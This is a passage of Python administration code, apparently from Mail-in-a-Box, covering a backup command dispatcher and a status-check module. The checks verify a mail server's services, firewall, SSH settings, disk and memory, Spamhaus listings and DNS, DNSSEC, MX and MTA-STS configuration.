run_duplicity_verification() elif sys.argv[-1] == "--list": # List the saved backup files. for fn, size in list_target_files(get_backup_config(load_environment())): print(f"{fn}\t{size}") elif sys.argv[-1] == "--status": # Show backup status. ret = backup_status(load_environment()) print(rtyaml.dump(ret["backups"])) print("Storage for unmatched files:", ret["unmatched_file_size"]) elif len(sys.argv) >= 2 and sys.argv[1] == "--restore": # Run duplicity restore. Rest of command line passed as arguments # to duplicity. The restore path should be specified. run_duplicity_restore(sys.argv[2:]) elif sys.argv[-1] == "--duplicity-command": print_duplicity_command() else: # Perform a backup. Add --full to force a full backup rather than # possibly performing an incremental backup. full_backup = "--full" in sys.argv perform_backup(full_backup) File: management/status_checks.py #!/usr/local/lib/mailinabox/env/bin/python # # Checks that the upstream DNS has been set correctly and that # TLS certificates have been signed, etc., and if not tells the user # what to do next. import sys, os, os.path, re, datetime, multiprocessing.pool import asyncio import dns.reversename, dns.resolver import idna import psutil import postfix_mta_sts_resolver.resolver from dns_update import get_dns_zones, build_tlsa_record, get_custom_dns_config, get_secondary_dns, get_custom_dns_records from web_update import get_web_domains, get_domains_with_a_records from ssl_certificates import get_ssl_certificates, get_domain_ssl_files, check_certificate from mailconfig import get_mail_domains, get_mail_aliases from utils import shell, sort_domains, load_env_vars_from_file, load_settings, get_ssh_port, get_ssh_config_value def get_services(): return [ { "name": "Local DNS (bind9)", "port": 53, "public": False, }, #{ "name": "NSD Control", "port": 8952, "public": False, }, { "name": "Local DNS Control (bind9/rndc)", "port": 953, "public": False, }, { "name": "Dovecot LMTP LDA", "port": 10026, "public": False, }, { "name": "Postgrey", "port": 10023, "public": False, }, { "name": "Spamassassin", "port": 10025, "public": False, }, { "name": "OpenDKIM", "port": 8891, "public": False, }, { "name": "OpenDMARC", "port": 8893, "public": False, }, { "name": "Mail-in-a-Box Management Daemon", "port": 10222, "public": False, }, { "name": "SSH Login (ssh)", "port": get_ssh_port(), "public": True, }, { "name": "Public DNS (nsd4)", "port": 53, "public": True, }, { "name": "Incoming Mail (SMTP/postfix)", "port": 25, "public": True, }, { "name": "Outgoing Mail (SMTP 465/postfix)", "port": 465, "public": True, }, { "name": "Outgoing Mail (SMTP 587/postfix)", "port": 587, "public": True, }, #{ "name": "Postfix/master", "port": 10587, "public": True, }, { "name": "IMAPS (dovecot)", "port": 993, "public": True, }, { "name": "Mail Filters (Sieve/dovecot)", "port": 4190, "public": True, }, { "name": "HTTP Web (nginx)", "port": 80, "public": True, }, { "name": "HTTPS Web (nginx)", "port": 443, "public": True, }, ] def run_checks(rounded_values, env, output, pool, domains_to_check=None): # run systems checks output.add_heading("System") # check that services are running if not run_services_checks(env, output, pool): # If critical services are not running, stop. If bind9 isn't running, # all later DNS checks will timeout and that will take forever to # go through, and if running over the web will cause a fastcgi timeout. return # clear bind9's DNS cache so our DNS checks are up to date # (ignore errors; if bind9/rndc isn't running we'd already report # that in run_services checks.) shell('check_call', ["/usr/sbin/rndc", "flush"], trap=True) run_system_checks(rounded_values, env, output) # perform other checks asynchronously run_network_checks(env, output) run_domain_checks(rounded_values, env, output, pool, domains_to_check=domains_to_check) def run_services_checks(env, output, pool): # Check that system services are running. all_running = True fatal = False ret = pool.starmap(check_service, ((i, service, env) for i, service in enumerate(get_services())), chunksize=1) for _i, running, fatal2, output2 in sorted(ret): if output2 is None: continue # skip check (e.g. no port was set, e.g. no sshd) all_running = all_running and running fatal = fatal or fatal2 output2.playback(output) # Check fail2ban. code, ret = shell('check_output', ["fail2ban-client", "status"], capture_stderr=True, trap=True) if code != 0: output.print_error("fail2ban is not running.") all_running = False if all_running: output.print_ok("All system services are running.") return not fatal def check_service(i, service, env): if not service["port"]: # Skip check (no port, e.g. no sshd). return (i, None, None, None) output = BufferedOutput() running = False fatal = False # Helper function to make a connection to the service, since we try # up to three ways (localhost, IPv4 address, IPv6 address). def try_connect(ip): # Connect to the given IP address on the service's port with a one-second timeout. import socket s = socket.socket(socket.AF_INET if ":" not in ip else socket.AF_INET6, socket.SOCK_STREAM) s.settimeout(1) try: s.connect((ip, service["port"])) return True except OSError: # timed out or some other odd error return False finally: s.close() if service["public"]: # Service should be publicly accessible. if try_connect(env["PUBLIC_IP"]): # IPv4 ok. if not env.get("PUBLIC_IPV6") or service.get("ipv6") is False or try_connect(env["PUBLIC_IPV6"]): # No IPv6, or service isn't meant to run on IPv6, or IPv6 is good. running = True # IPv4 ok but IPv6 failed. Try the PRIVATE_IPV6 address to see if the service is bound to the interface. elif service["port"] != 53 and try_connect(env["PRIVATE_IPV6"]): output.print_error("%s is running (and available over IPv4 and the local IPv6 address), but it is not publicly accessible at %s:%d." % (service['name'], env['PUBLIC_IPV6'], service['port'])) else: output.print_error("%s is running and available over IPv4 but is not accessible over IPv6 at %s port %d." % (service['name'], env['PUBLIC_IPV6'], service['port'])) # IPv4 failed. Try the private IP to see if the service is running but not accessible (except DNS because a different service runs on the private IP). elif service["port"] != 53 and try_connect("127.0.0.1"): output.print_error("%s is running but is not publicly accessible at %s:%d." % (service['name'], env['PUBLIC_IP'], service['port'])) else: output.print_error("%s is not running (port %d)." % (service['name'], service['port'])) # Why is nginx not running? if not running and service["port"] in {80, 443}: output.print_line(shell('check_output', ['nginx', '-t'], capture_stderr=True, trap=True)[1].strip()) # Service should be running locally. elif try_connect("127.0.0.1"): running = True else: output.print_error("%s is not running (port %d)." % (service['name'], service['port'])) # Flag if local DNS is not running. if not running and service["port"] == 53 and service["public"] is False: fatal = True return (i, running, fatal, output) def run_system_checks(rounded_values, env, output): check_ssh_password(env, output) check_software_updates(env, output) check_miab_version(env, output) check_system_aliases(env, output) check_free_disk_space(rounded_values, env, output) check_free_memory(rounded_values, env, output) def check_ufw(env, output): if not os.path.isfile('/usr/sbin/ufw'): output.print_warning("""The ufw program was not installed. If your system is able to run iptables, rerun the setup.""") return code, ufw = shell('check_output', ['ufw', 'status'], trap=True) if code != 0: # The command failed, it's safe to say the firewall is disabled output.print_warning("""The firewall is not working on this machine. An error was received while trying to check the firewall. To investigate run 'sudo ufw status'.""") return ufw = ufw.splitlines() if ufw[0] == "Status: active": not_allowed_ports = 0 for service in get_services(): if service["public"] and not is_port_allowed(ufw, service["port"]): not_allowed_ports += 1 output.print_error("Port {} ({}) should be allowed in the firewall, please re-run the setup.".format(service["port"], service["name"])) if not_allowed_ports == 0: output.print_ok("Firewall is active.") else: output.print_warning("""The firewall is disabled on this machine. This might be because the system is protected by an external firewall. We can't protect the system against bruteforce attacks without the local firewall active. Connect to the system via ssh and try to run: ufw enable.""") def is_port_allowed(ufw, port): return any(re.match(str(port) +"[/ \t].*", item) for item in ufw) def check_ssh_password(env, output): config_value = get_ssh_config_value("passwordauthentication") if config_value: if config_value == "no": output.print_ok("SSH disallows password-based login.") else: output.print_error("""The SSH server on this machine permits password-based login. A more secure way to log in is using a public key. Add your SSH public key to $HOME/.ssh/authorized_keys, check that you can log in without a password, set the option 'PasswordAuthentication no' in /etc/ssh/sshd_config, and then restart the openssh via 'sudo service ssh restart'.""") def is_reboot_needed_due_to_package_installation(): return os.path.exists("/var/run/reboot-required") def check_software_updates(env, output): # Check for any software package updates. pkgs = list_apt_updates(apt_update=False) if is_reboot_needed_due_to_package_installation(): output.print_error("System updates have been installed and a reboot of the machine is required.") elif len(pkgs) == 0: output.print_ok("System software is up to date.") else: output.print_error("There are %d software packages that can be updated." % len(pkgs)) for p in pkgs: output.print_line("{} ({})".format(p["package"], p["version"])) def check_system_aliases(env, output): # Check that the administrator alias exists since that's where all # admin email is automatically directed. check_alias_exists("System administrator address", "administrator@" + env['PRIMARY_HOSTNAME'], env, output) def check_free_disk_space(rounded_values, env, output): # Check free disk space. st = os.statvfs(env['STORAGE_ROOT']) bytes_total = st.f_blocks * st.f_frsize bytes_free = st.f_bavail * st.f_frsize disk_msg = "The disk has %.2f GB space remaining." % (bytes_free/1024.0/1024.0/1024.0) if bytes_free > .3 * bytes_total: if rounded_values: disk_msg = "The disk has more than 30% free space." output.print_ok(disk_msg) elif bytes_free > .15 * bytes_total: if rounded_values: disk_msg = "The disk has less than 30% free space." output.print_warning(disk_msg) else: if rounded_values: disk_msg = "The disk has less than 15% free space." output.print_error(disk_msg) # Check that there's only one duplicity cache. If there's more than one, # it's probably no longer in use, and we can recommend clearing the cache # to save space. The cache directory may not exist yet, which is OK. backup_cache_path = os.path.join(env['STORAGE_ROOT'], 'backup/cache') try: backup_cache_count = len(os.listdir(backup_cache_path)) except: backup_cache_count = 0 if backup_cache_count > 1: output.print_warning(f"The backup cache directory {backup_cache_path} has more than one backup target cache. Consider clearing this directory to save disk space.") def check_free_memory(rounded_values, env, output): # Check free memory. percent_free = 100 - psutil.virtual_memory().percent memory_msg = "System memory is %s%% free." % str(round(percent_free)) if percent_free >= 20: if rounded_values: memory_msg = "System free memory is at least 20%." output.print_ok(memory_msg) elif percent_free >= 10: if rounded_values: memory_msg = "System free memory is below 20%." output.print_warning(memory_msg) else: if rounded_values: memory_msg = "System free memory is below 10%." output.print_error(memory_msg) def run_network_checks(env, output): # Also see setup/network-checks.sh. output.add_heading("Network") check_ufw(env, output) # Stop if we cannot make an outbound connection on port 25. Many residential # networks block outbound port 25 to prevent their network from sending spam. # See if we can reach one of Google's MTAs with a 5-second timeout. _code, ret = shell("check_call", ["/bin/nc", "-z", "-w5", "aspmx.l.google.com", "25"], trap=True) if ret == 0: output.print_ok("Outbound mail (SMTP port 25) is not blocked.") else: output.print_error("""Outbound mail (SMTP port 25) seems to be blocked by your network. You will not be able to send any mail. Many residential networks block port 25 to prevent hijacked machines from being able to send spam. A quick connection test to Google's mail server on port 25 failed.""") # Stop if the IPv4 address is listed in the ZEN Spamhaus Block List. # The user might have ended up on an IP address that was previously in use # by a spammer, or the user may be deploying on a residential network. We # will not be able to reliably send mail in these cases. # See https://www.spamhaus.org/news/article/807/using-our-public-mirrors-check-your-return-codes-now. for # information on spamhaus return codes rev_ip4 = ".".join(reversed(env['PUBLIC_IP'].split('.'))) zen = query_dns(rev_ip4+'.zen.spamhaus.org', 'A', nxdomain=None) if zen is None: output.print_ok("IP address is not blacklisted by zen.spamhaus.org.") elif zen == "[timeout]": output.print_warning("Connection to zen.spamhaus.org timed out. Could not determine whether this box's IP address is blacklisted. Please try again later.") elif zen == "[Not Set]": output.print_warning("Could not connect to zen.spamhaus.org. Could not determine whether this box's IP address is blacklisted. Please try again later.") elif zen == "127.255.255.252": output.print_warning("Incorrect spamhaus query: %s. Could not determine whether this box's IP address is blacklisted." % (rev_ip4+'.zen.spamhaus.org')) elif zen == "127.255.255.254": output.print_warning("Mail-in-a-Box is configured to use a public DNS server. This is not supported by spamhaus. Could not determine whether this box's IP address is blacklisted.") elif zen == "127.255.255.255": output.print_warning("Too many queries have been performed on the spamhaus server. Could not determine whether this box's IP address is blacklisted.") else: output.print_error("""The IP address of this machine {} is listed in the Spamhaus Block List (code {}), which may prevent recipients from receiving your email. See http://www.spamhaus.org/query/ip/{}.""".format(env['PUBLIC_IP'], zen, env['PUBLIC_IP'])) def run_domain_checks(rounded_time, env, output, pool, domains_to_check=None): # Get the list of domains we handle mail for. mail_domains = get_mail_domains(env) # Get the list of domains we serve DNS zones for (i.e. does not include subdomains). dns_zonefiles = dict(get_dns_zones(env)) dns_domains = set(dns_zonefiles) # Get the list of domains we serve HTTPS for. web_domains = set(get_web_domains(env)) if domains_to_check is None: domains_to_check = mail_domains | dns_domains | web_domains # Remove "www", "autoconfig", "autodiscover", and "mta-sts" subdomains, which we group with their parent, # if their parent is in the domains to check list. domains_to_check = [ d for d in domains_to_check if not ( d.split(".", 1)[0] in {"www", "autoconfig", "autodiscover", "mta-sts"} and len(d.split(".", 1)) == 2 and d.split(".", 1)[1] in domains_to_check ) ] # Get the list of domains that we don't serve web for because of a custom CNAME/A record. domains_with_a_records = get_domains_with_a_records(env) # Serial version: #for domain in sort_domains(domains_to_check, env): # run_domain_checks_on_domain(domain, rounded_time, env, dns_domains, dns_zonefiles, mail_domains, web_domains) # Parallelize the checks across a worker pool. args = ((domain, rounded_time, env, dns_domains, dns_zonefiles, mail_domains, web_domains, domains_with_a_records) for domain in domains_to_check) ret = pool.starmap(run_domain_checks_on_domain, args, chunksize=1) ret = dict(ret) # (domain, output) => { domain: output } for domain in sort_domains(ret, env): ret[domain].playback(output) def run_domain_checks_on_domain(domain, rounded_time, env, dns_domains, dns_zonefiles, mail_domains, web_domains, domains_with_a_records): output = BufferedOutput() # When running inside Flask, the worker threads don't get a thread pool automatically. # Also this method is called in a forked worker pool, so creating a new loop is probably # a good idea. asyncio.set_event_loop(asyncio.new_event_loop()) # we'd move this up, but this returns non-pickleable values ssl_certificates = get_ssl_certificates(env) # The domain is IDNA-encoded in the database, but for display use Unicode. try: domain_display = idna.decode(domain.encode('ascii')) output.add_heading(domain_display) except (ValueError, UnicodeError, idna.IDNAError) as e: # Looks like we have some invalid data in our database. output.add_heading(domain) output.print_error("Domain name is invalid: " + str(e)) if domain == env["PRIMARY_HOSTNAME"]: check_primary_hostname_dns(domain, env, output, dns_domains, dns_zonefiles) if domain in dns_domains: check_dns_zone(domain, env, output, dns_zonefiles) if domain in mail_domains: check_mail_domain(domain, env, output) if domain in web_domains: check_web_domain(domain, rounded_time, ssl_certificates, env, output) if domain in dns_domains: check_dns_zone_suggestions(domain, env, output, dns_zonefiles, domains_with_a_records) # Check auto-configured subdomains. See run_domain_checks. # Skip mta-sts because we check the policy directly. for label in ("www", "autoconfig", "autodiscover"): subdomain = label + "." + domain if subdomain in web_domains or subdomain in mail_domains: # Run checks. subdomain_output = run_domain_checks_on_domain(subdomain, rounded_time, env, dns_domains, dns_zonefiles, mail_domains, web_domains, domains_with_a_records) # Prepend the domain name to the start of each check line, and then add to the # checks for this domain. for attr, args, kwargs in subdomain_output[1].buf: if attr == "add_heading": # Drop the heading, but use its text as the subdomain name in # each line since it is in Unicode form. subdomain = args[0] continue if len(args) == 1 and isinstance(args[0], str): args = [ subdomain + ": " + args[0] ] getattr(output, attr)(*args, **kwargs) return (domain, output) def check_primary_hostname_dns(domain, env, output, dns_domains, dns_zonefiles): # If a DS record is set on the zone containing this domain, check DNSSEC now. has_dnssec = False for zone in dns_domains: if (zone == domain or domain.endswith("." + zone)) and query_dns(zone, "DS", nxdomain=None) is not None: has_dnssec = True check_dnssec(zone, env, output, dns_zonefiles, is_checking_primary=True) ip = query_dns(domain, "A") ns_ips = query_dns("ns1." + domain, "A") + '/' + query_dns("ns2." + domain, "A") my_ips = env['PUBLIC_IP'] + ((" / "+env['PUBLIC_IPV6']) if env.get("PUBLIC_IPV6") else "") # Check that the ns1/ns2 hostnames resolve to A records. This information probably # comes from the TLD since the information is set at the registrar as glue records. # We're probably not actually checking that here but instead checking that we, as # the nameserver, are reporting the right info --- but if the glue is incorrect this # will probably fail. if ns_ips == env['PUBLIC_IP'] + '/' + env['PUBLIC_IP']: output.print_ok("Nameserver glue records are correct at registrar. [ns1/ns2.{} ↦ {}]".format(env['PRIMARY_HOSTNAME'], env['PUBLIC_IP'])) elif ip == env['PUBLIC_IP']: # The NS records are not what we expect, but the domain resolves correctly, so # the user may have set up external DNS. List this discrepancy as a warning. output.print_warning("""Nameserver glue records (ns1.{} and ns2.{}) should be configured at your domain name registrar as having the IP address of this box ({}). They currently report addresses of {}. If you have set up External DNS, this may be OK.""".format(env['PRIMARY_HOSTNAME'], env['PRIMARY_HOSTNAME'], env['PUBLIC_IP'], ns_ips)) else: output.print_error("""Nameserver glue records are incorrect. The ns1.{} and ns2.{} nameservers must be configured at your domain name registrar as having the IP address {}. They currently report addresses of {}. It may take several hours for public DNS to update after a change.""".format(env['PRIMARY_HOSTNAME'], env['PRIMARY_HOSTNAME'], env['PUBLIC_IP'], ns_ips)) # Check that PRIMARY_HOSTNAME resolves to PUBLIC_IP[V6] in public DNS. ipv6 = query_dns(domain, "AAAA") if env.get("PUBLIC_IPV6") else None if ip == env['PUBLIC_IP'] and not (ipv6 and env['PUBLIC_IPV6'] and ipv6 != normalize_ip(env['PUBLIC_IPV6'])): output.print_ok("Domain resolves to box's IP address. [{} ↦ {}]".format(env['PRIMARY_HOSTNAME'], my_ips)) else: output.print_error("""This domain must resolve to this box's IP address ({}) in public DNS but it currently resolves to {}. It may take several hours for public DNS to update after a change. This problem may result from other issues listed above.""".format(my_ips, ip + ((" / " + ipv6) if ipv6 is not None else ""))) # Check reverse DNS matches the PRIMARY_HOSTNAME. Note that it might not be # a DNS zone if it is a subdomain of another domain we have a zone for. existing_rdns_v4 = query_dns(dns.reversename.from_address(env['PUBLIC_IP']), "PTR") existing_rdns_v6 = query_dns(dns.reversename.from_address(env['PUBLIC_IPV6']), "PTR") if env.get("PUBLIC_IPV6") else None if existing_rdns_v4 == domain and existing_rdns_v6 in {None, domain}: output.print_ok("Reverse DNS is set correctly at ISP. [{} ↦ {}]".format(my_ips, env['PRIMARY_HOSTNAME'])) elif existing_rdns_v4 == existing_rdns_v6 or existing_rdns_v6 is None: output.print_error(f"""This box's reverse DNS is currently {existing_rdns_v4}, but it should be {domain}. Your ISP or cloud provider will have instructions on setting up reverse DNS for this box.""" ) else: output.print_error(f"""This box's reverse DNS is currently {existing_rdns_v4} (IPv4) and {existing_rdns_v6} (IPv6), but it should be {domain}. Your ISP or cloud provider will have instructions on setting up reverse DNS for this box.""" ) # Check the TLSA record. tlsa_qname = "_25._tcp." + domain tlsa25 = query_dns(tlsa_qname, "TLSA", nxdomain=None) tlsa25_expected = build_tlsa_record(env) if tlsa25 == tlsa25_expected: output.print_ok("""The DANE TLSA record for incoming mail is correct (%s).""" % tlsa_qname,) elif tlsa25 is None: if has_dnssec: # Omit a warning about it not being set if DNSSEC isn't enabled, # since TLSA shouldn't be used without DNSSEC. output.print_warning("""The DANE TLSA record for incoming mail is not set. This is optional.""") else: output.print_error(f"""The DANE TLSA record for incoming mail ({tlsa_qname}) is not correct. It is '{tlsa25}' but it should be '{tlsa25_expected}'. It may take several hours for public DNS to update after a change.""") # Check that the hostmaster@ email address exists. check_alias_exists("Hostmaster contact address", "hostmaster@" + domain, env, output) def check_alias_exists(alias_name, alias, env, output): mail_aliases = {address: receivers for address, receivers, *_ in get_mail_aliases(env)} if alias in mail_aliases: if mail_aliases[alias]: output.print_ok(f"{alias_name} exists as a mail alias. [{alias} ↦ {mail_aliases[alias]}]") else: output.print_error("""You must set the destination of the mail alias for %s to direct email to you or another administrator.""" % alias) else: output.print_error("""You must add a mail alias for %s which directs email to you or another administrator.""" % alias) def check_dns_zone(domain, env, output, dns_zonefiles): # If a DS record is set at the registrar, check DNSSEC first because it will affect the NS query. # If it is not set, we suggest it last. if query_dns(domain, "DS", nxdomain=None) is not None: check_dnssec(domain, env, output, dns_zonefiles) # We provide a DNS zone for the domain. It should have NS records set up # at the domain name's registrar pointing to this box. The secondary DNS # server may be customized. # (I'm not sure whether this necessarily tests the TLD's configuration, # as it should, or if one successful NS line at the TLD will result in # this query being answered by the box, which would mean the test is only # half working.) custom_dns_records = list(get_custom_dns_config(env)) # generator => list so we can reuse it correct_ip = "; ".join(sorted(get_custom_dns_records(custom_dns_records, domain, "A"))) or env['PUBLIC_IP'] custom_secondary_ns = get_secondary_dns(custom_dns_records, mode="NS") secondary_ns = custom_secondary_ns or ["ns2." + env['PRIMARY_HOSTNAME']] existing_ns = query_dns(domain, "NS") correct_ns = "; ".join(sorted(["ns1." + env["PRIMARY_HOSTNAME"], *secondary_ns])) ip = query_dns(domain, "A") probably_external_dns = False if existing_ns.lower() == correct_ns.lower(): output.print_ok("Nameservers are set correctly at registrar. [%s]" % correct_ns) elif ip == correct_ip: # The domain resolves correctly, so maybe the user is using External DNS. output.print_warning(f"""The nameservers set on this domain at your domain name registrar should be {correct_ns}. They are currently {existing_ns}. If you are using External DNS, this may be OK.""" ) probably_external_dns = True else: output.print_error(f"""The nameservers set on this domain are incorrect. They are currently {existing_ns}. Use your domain name registrar's control panel to set the nameservers to {correct_ns}.""" ) # Check that each custom secondary nameserver resolves the IP address. if custom_secondary_ns and not probably_external_dns: for ns in custom_secondary_ns: # We must first resolve the nameserver to an IP address so we can query it. ns_ips = query_dns(ns, "A") if not ns_ips or ns_ips in {'[Not Set]', '[timeout]'}: output.print_error("Secondary nameserver %s is not valid (it doesn't resolve to an IP address)." % ns) continue # Choose the first IP if nameserver returns multiple ns_ip = ns_ips.split('; ')[0] # Now query it to see what it says about this domain. ip = query_dns(domain, "A", at=ns_ip, nxdomain=None) if ip == correct_ip: output.print_ok("Secondary nameserver %s resolved the domain correctly." % ns) elif ip is None: output.print_error("Secondary nameserver %s is not configured to resolve this domain." % ns) else: output.print_error(f"Secondary nameserver {ns} is not configured correctly. (It resolved this domain as {ip}. It should be {correct_ip}.)") def check_dns_zone_suggestions(domain, env, output, dns_zonefiles, domains_with_a_records): # Warn if a custom DNS record is preventing this or the automatic www redirect from # being served. if domain in domains_with_a_records: output.print_warning("""Web has been disabled for this domain because you have set a custom DNS record.""") if "www." + domain in domains_with_a_records: output.print_warning("""A redirect from 'www.%s' has been disabled for this domain because you have set a custom DNS record on the www subdomain.""" % domain) # Since DNSSEC is optional, if a DS record is NOT set at the registrar suggest it. # (If it was set, we did the check earlier.) if query_dns(domain, "DS", nxdomain=None) is None: check_dnssec(domain, env, output, dns_zonefiles) def check_dnssec(domain, env, output, dns_zonefiles, is_checking_primary=False): # See if the domain has a DS record set at the registrar. The DS record must # match one of the keys that we've used to sign the zone. It may use one of # several hashing algorithms. We've pre-generated all possible valid DS # records, although some will be preferred. alg_name_map = { '7': 'RSASHA1-NSEC3-SHA1', '8': 'RSASHA256', '13': 'ECDSAP256SHA256' } digalg_name_map = { '1': 'SHA-1', '2': 'SHA-256', '4': 'SHA-384' } # Read in the pre-generated DS records expected_ds_records = { } ds_file = '/etc/nsd/zones/' + dns_zonefiles[domain] + '.ds' if not os.path.exists(ds_file): return # Domain is in our database but DNS has not yet been updated. with open(ds_file, encoding="utf-8") as f: for rr_ds in f: rr_ds = rr_ds.rstrip() ds_keytag, ds_alg, ds_digalg, ds_digest = rr_ds.split("\t")[4].split(" ") # Some registrars may want the public key so they can compute the digest. The DS # record that we suggest using is for the KSK (and that's how the DS records were generated). # We'll also give the nice name for the key algorithm. dnssec_keys = load_env_vars_from_file(os.path.join(env['STORAGE_ROOT'], 'dns/dnssec/%s.conf' % alg_name_map[ds_alg])) with open(os.path.join(env['STORAGE_ROOT'], 'dns/dnssec/' + dnssec_keys['KSK'] + '.key'), encoding="utf-8") as f: dnsssec_pubkey = f.read().split("\t")[3].split(" ")[3] expected_ds_records[ (ds_keytag, ds_alg, ds_digalg, ds_digest) ] = { "record": rr_ds, "keytag": ds_keytag, "alg": ds_alg, "alg_name": alg_name_map[ds_alg], "digalg": ds_digalg, "digalg_name": digalg_name_map[ds_digalg], "digest": ds_digest, "pubkey": dnsssec_pubkey, } # Query public DNS for the DS record at the registrar. ds = query_dns(domain, "DS", nxdomain=None, as_list=True) if ds is None or isinstance(ds, str): ds = [] # There may be more that one record, so we get the result as a list. # Filter out records that don't look valid, just in case, and split # each record on spaces. ds = [tuple(str(rr).split(" ")) for rr in ds if len(str(rr).split(" ")) == 4] if len(ds) == 0: output.print_warning("""This domain's DNSSEC DS record is not set. The DS record is optional. The DS record activates DNSSEC. See below for instructions.""") else: matched_ds = set(ds) & set(expected_ds_records) if matched_ds: # At least one DS record matches one that corresponds with one of the ways we signed # the zone, so it is valid. # # But it may not be preferred. Only algorithm 13 is preferred. Warn if any of the # matched zones uses a different algorithm. if {r[1] for r in matched_ds} == { '13' } and {r[2] for r in matched_ds} <= { '2', '4' }: # all are alg 13 and digest type 2 or 4 output.print_ok("DNSSEC 'DS' record is set correctly at registrar.") return elif len([r for r in matched_ds if r[1] == '13' and r[2] in { '2', '4' }]) > 0: # some but not all are alg 13 output.print_ok("DNSSEC 'DS' record is set correctly at registrar. (Records using algorithm other than ECDSAP256SHA256 and digest types other than SHA-256/384 should be removed.)") return else: # no record uses alg 13 output.print_warning("""DNSSEC 'DS' record set at registrar is valid but should be updated to ECDSAP256SHA256 and SHA-256 (see below). IMPORTANT: Do not delete existing DNSSEC 'DS' records for this domain until confirmation that the new DNSSEC 'DS' record for this domain is valid.""") else: if is_checking_primary: output.print_error("""The DNSSEC 'DS' record for %s is incorrect. See further details below.""" % domain) return output.print_error("""This domain's DNSSEC DS record is incorrect. The chain of trust is broken between the public DNS system and this machine's DNS server. It may take several hours for public DNS to update after a change. If you did not recently make a change, you must resolve this immediately (see below).""") output.print_line("""Follow the instructions provided by your domain name registrar to set a DS record. Registrars support different sorts of DS records. Use the first option that works:""") preferred_ds_order = [(7, 2), (8, 4), (13, 4), (8, 2), (13, 2)] # low to high, see https://github.com/mail-in-a-box/mailinabox/issues/1998 def preferred_ds_order_func(ds_suggestion): k = (int(ds_suggestion['alg']), int(ds_suggestion['digalg'])) if k in preferred_ds_order: return preferred_ds_order.index(k) return -1 # index before first item output.print_line("") for i, ds_suggestion in enumerate(sorted(expected_ds_records.values(), key=preferred_ds_order_func, reverse=True)): if preferred_ds_order_func(ds_suggestion) == -1: continue # don't offer record types that the RFC says we must not offer output.print_line("") output.print_line("Option " + str(i+1) + ":") output.print_line("----------") output.print_line("Key Tag: " + ds_suggestion['keytag']) output.print_line("Key Flags: KSK / 257") output.print_line("Algorithm: {} / {}".format(ds_suggestion['alg'], ds_suggestion['alg_name'])) output.print_line("Digest Type: {} / {}".format(ds_suggestion['digalg'], ds_suggestion['digalg_name'])) output.print_line("Digest: " + ds_suggestion['digest']) output.print_line("Public Key: ") output.print_line(ds_suggestion['pubkey'], monospace=True) output.print_line("") output.print_line("Bulk/Record Format:") output.print_line(ds_suggestion['record'], monospace=True) if len(ds) > 0: output.print_line("") output.print_line("The DS record is currently set to:") for rr in sorted(ds): output.print_line("Key Tag: {}, Algorithm: {}, Digest Type: {}, Digest: {}".format(*rr)) def check_mail_domain(domain, env, output): # Check the MX record. recommended_mx = "10 " + env['PRIMARY_HOSTNAME'] mx = query_dns(domain, "MX", nxdomain=None) if mx is None or mx == "[timeout]": mxhost = None else: # query_dns returns a semicolon-delimited list # of priority-host pairs. mxhost = mx.split('; ')[0].split(' ')[1] if mxhost is None: # A missing MX record is okay on the primary hostname because # the primary hostname's A record (the MX fallback) is... itself, # which is what we want the MX to be. if domain == env['PRIMARY_HOSTNAME']: output.print_ok(f"Domain's email is directed to this domain. [{domain} has no MX record, which is ok]") # And a missing MX record is okay on other domains if the A record # matches the A record of the PRIMARY_HOSTNAME. Actually this will # probably confuse DANE TLSA, but we'll let that slide for now. else: domain_a = query_dns(domain, "A", nxdomain=None) primary_a = query_dns(env['PRIMARY_HOSTNAME'], "A", nxdomain=None) if domain_a is not None and domain_a == primary_a: output.print_ok(f"Domain's email is directed to this domain. [{domain} has no MX record but its A record is OK]") else: output.print_error(f"""This domain's DNS MX record is not set. It should be '{recommended_mx}'. Mail will not be delivered to this box. It may take several hours for public DNS to update after a change. This problem may result from other issues listed here.""") elif mxhost == env['PRIMARY_HOSTNAME']: good_news = f"Domain's email is directed to this domain. [{domain} ↦ {mx}]" if mx != recommended_mx: good_news += f" This configuration is non-standard. The recommended configuration is '{recommended_mx}'." output.print_ok(good_news) # Check MTA-STS policy. loop = asyncio.new_event_loop() sts_resolver = postfix_mta_sts_resolver.resolver.STSResolver(loop=loop) valid, policy = loop.run_until_complete(sts_resolver.resolve(domain)) if valid == postfix_mta_sts_resolver.resolver.STSFetchResult.VALID: if policy[1].get("mx") == [env['PRIMARY_HOSTNAME']] and policy[1].get("mode") == "enforce": # policy[0] is the policyid output.print_ok("MTA-STS policy is present.") else: output.print_error(f"MTA-STS policy is present but has unexpected settings. [{policy[1]}]") else: output.print_error(f"MTA-STS policy is missing: {valid}") else: output.print_error(f"""This domain's DNS MX record is incorrect. It is currently set to '{mx}' but should be '{recommended_mx}'. Mail will not be delivered to this box. It may take several hours for public DNS to update after a change. This problem may result from other issues listed here.""") # Check that the postmaster@ email address exists. Not required if the domain has a # catch-all address or domain alias. if "@" + domain not in [address for address, *_ in get_mail_aliases(env)]: check_alias_exists("Postmaster contact address", "postmaster@" + domain, env, output) # Stop if the domain is listed in the Spamhaus Domain Block List. # The user might have chosen a domain that was previously in use by a spammer # and will not be able to reliably send mail. # See https://www.spamhaus.org/news/article/807/using-our-public-mirrors-check-your-return-codes-now. for # information on spamhaus return codes dbl = query_dns(domain+'.dbl.spamhaus.org', "A", nxdomain=None) if dbl is None: output.print_ok("Domain is not blacklisted by dbl.spamhaus.org.") elif dbl == "[timeout]": output.print_warning(f"Connection to dbl.spamhaus.org timed out. Could not determine whether the domain {domain} is blacklisted. Please try again later.") elif dbl == "[Not Set]": output.print_warning(f"Could not connect to dbl.spamhaus.org. Could not determine whether the domain {domain} is blacklisted. Please try again later.") elif dbl == "127.255.255.252": output.print_warning("Incorrect spamhaus query: %s. Could not determine whether the domain %s is blacklisted." % (domain+'.dbl.spamhaus.org', domain)) elif dbl == "127.255.255.254": output.print_warning("Mail-in-a-Box is configured to use a public DNS server. This is not supported by spamhaus. Could not determine whether the domain {} is blacklisted.".format(domain)) elif dbl == "127.255.255.255": output.print_warning("Too many queries have been performed on the spamhaus server. Could not determine whether the domain {} is blacklisted.".format(domain)) else: output.print_error(f"""This domain is listed in the Spamhaus Domain Block List (code {dbl}), which may prevent recipients from receiving your mail. See http://www.spamhaus.org/dbl/ and http://www.spamhaus.org/query/domain/{domain}.""") def check_web_domain(domain, rounded_time, ssl_certificates, env, output): # See if the domain's A record resolves to our PUBLIC_IP. This is already checked # for PRIMARY_HOSTNAME, for which it is required for mail specifically. For it and # other domains, it is required to access its website. if domain != env['PRIMARY_HOSTNAME']: ok_values = [] for (rtype, expected) in (("A", 